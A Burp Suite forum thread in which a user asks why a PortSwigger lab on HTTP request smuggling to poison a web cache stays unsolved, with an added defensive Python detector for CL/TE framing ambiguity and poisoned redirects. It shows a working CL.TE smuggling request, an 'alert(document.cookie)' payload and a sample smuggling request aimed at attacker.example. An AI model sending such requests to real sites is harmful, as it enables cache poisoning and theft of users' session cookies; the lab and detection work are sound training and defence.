The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum


Unable to solve: Lab: Exploiting HTTP request smuggling to perform web cache poisoning

2lfa | Last updated: Jul 30, 2024 01:37PM UTC

As the title states, I am unable to solve this lab. I follow the exploit steps, and it works: I manage to poison the cache and get a redirection to my exploit server, so that the alert gets executed (even though it's empty). But the lab doesn't get solved!!

On the exploit server my crafted response looks like this:

-------------------------------------------------
HTTP/2 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Academy Exploit Server
Content-Length: 22

alert(document.cookie)
-------------------------------------------------

My exploit looks like the following:

-------------------------------------------------
POST / HTTP/1.1
Host: abcdabcdabcdabcdabcdabcdabcdabcde.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Transfer-Encoding: chunked

0

GET /post/next?postId=3 HTTP/1.1
Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
-------------------------------------------------

After I manage to poison the cache I obtain:

-------------------------------------------------
REQUEST
-------------------------------------------------
GET /resources/js/tracking.js HTTP/2
Host: abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net
Cookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers
-------------------------------------------------

-------------------------------------------------
RESPONSE
-------------------------------------------------
HTTP/2 302 Found
Location: https://exploit-exploitexploitexploitexploitexpl.exploit-server.net/post?postId=4
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 8
X-Cache: hit
Content-Length: 0
-------------------------------------------------

-------------------------------------------------
REQUEST
-------------------------------------------------
GET /post?postId=4 HTTP/2
Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Te: trailers
-------------------------------------------------

-------------------------------------------------
RESPONSE
-------------------------------------------------
HTTP/2 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Academy Exploit Server
Content-Length: 22

alert(document.cookie)
-------------------------------------------------

Why doesn't the lab get solved even though I get a redirection to my exploit server and the alert script is executed?!
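The request in the post carries both Content-Length and Transfer-Encoding, which is the framing ambiguity this lab is built on, and the cached 302 for tracking.js shows what a poisoned entry looks like from the client side: a cacheable redirect for a same-origin script that points at another host. The Python below is an added example written for this page, not code from the thread, the lab or PortSwigger. It parses a constructed request of the same shape (the hosts lab.example and attacker.example are placeholders, not the lab's) and reports how many bytes a Content-Length parser would forward past the terminating chunk, then checks a response for a cacheable off-origin redirect. Both are the checks a proxy test suite or a cache audit would use to detect the condition.

```python
"""Detect CL/TE framing ambiguity in an HTTP/1.1 request and cacheable
off-origin redirects in a response.  Added example; the sample messages
are constructed here and the host names are placeholders."""

import re
from typing import NamedTuple, Optional
from urllib.parse import urlsplit


class FramingReport(NamedTuple):
    has_content_length: bool
    has_transfer_encoding: bool
    content_length: Optional[int]
    chunked_body_len: Optional[int]  # bytes a chunked decoder consumes; None if no 0-chunk
    leftover: bytes                  # covered by Content-Length but after the 0-chunk


def _split_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (lower-cased header list, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("message has no end-of-headers CRLFCRLF")
    headers = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return headers, body


def _chunked_consumed(body: bytes) -> Optional[int]:
    """Bytes a chunked decoder consumes up to and including the 0-size chunk
    and its trailer section; None if the terminating chunk never arrives."""
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end == -1:
            return None
        try:
            size = int(body[pos:end].split(b";", 1)[0].strip(), 16)
        except ValueError:
            return None
        pos = end + 2
        if size == 0:
            # Trailer section: zero or more header lines, then an empty line.
            while True:
                end = body.find(b"\r\n", pos)
                if end == -1:
                    return None
                if end == pos:                    # empty line ends the message
                    return end + 2
                pos = end + 2
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            return None
        pos += 2


def analyse_request(raw: bytes) -> FramingReport:
    """If both headers are present and the chunked body ends before
    Content-Length does, a front end honouring Content-Length forwards
    bytes that a back end honouring Transfer-Encoding reads as the start
    of a second request.  `leftover` is exactly those bytes."""
    headers, body = _split_message(raw)
    cl = next((v for n, v in headers if n == "content-length"), None)
    te = next((v for n, v in headers if n == "transfer-encoding"), None)
    cl_int = int(cl) if cl is not None and cl.isdigit() else None
    consumed = _chunked_consumed(body) if te and "chunked" in te.lower() else None
    leftover = b""
    if cl_int is not None and consumed is not None and cl_int > consumed:
        leftover = body[consumed:cl_int]
    return FramingReport(cl is not None, te is not None, cl_int, consumed, leftover)


def cached_offsite_redirect(status: int, headers: dict, origin_host: str) -> bool:
    """True when a redirect is cacheable and points at a host other than
    the origin, the shape of a poisoned cache entry for a same-origin script."""
    h = {k.lower(): v for k, v in headers.items()}
    if status not in (301, 302, 303, 307, 308):
        return False
    target = urlsplit(h.get("location", "")).hostname
    if target is None or target.lower() == origin_host.lower():
        return False
    cc = h.get("cache-control", "").lower()
    max_age = re.search(r"max-age=(\d+)", cc)
    return not ("no-store" in cc or (max_age and int(max_age.group(1)) == 0))


# Constructed sample with the same shape as the request in the thread.
SMUGGLED_PREFIX = b"GET /next HTTP/1.1\r\nHost: attacker.example\r\nX-Ignore: "
_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
SAMPLE_SMUGGLING_REQUEST = (
    b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n"
    + b"Transfer-Encoding: chunked\r\n\r\n" + _BODY
)

if __name__ == "__main__":
    report = analyse_request(SAMPLE_SMUGGLING_REQUEST)
    print("CL+TE present:", report.has_content_length and report.has_transfer_encoding)
    print("bytes left after 0-chunk:", len(report.leftover))
    print("poisoned-looking 302:", cached_offsite_redirect(
        302, {"Location": "https://attacker.example/post?postId=4",
              "Cache-Control": "max-age=30"}, "lab.example"))
```

A front end that rejects or normalises requests carrying both framing headers (RFC 9112 says Transfer-Encoding wins and the request should be treated as an error when both appear) removes the `leftover` bytes before they reach the back end; the redirect check is what a CDN or reverse-proxy test would run against cached responses for script paths to catch the poisoned entry the thread shows.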

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:15PM UTC

Thanks for getting in touch. I've just been through this lab myself and was able to solve it. You might have to resend the request to poison the cache more than once, as you need to time this with when the victim is not only visiting the site but also requesting the tracking.js file, so it can sometimes be tricky to get the timing right. It would be worth trying this again to see if you have more success a second time around.
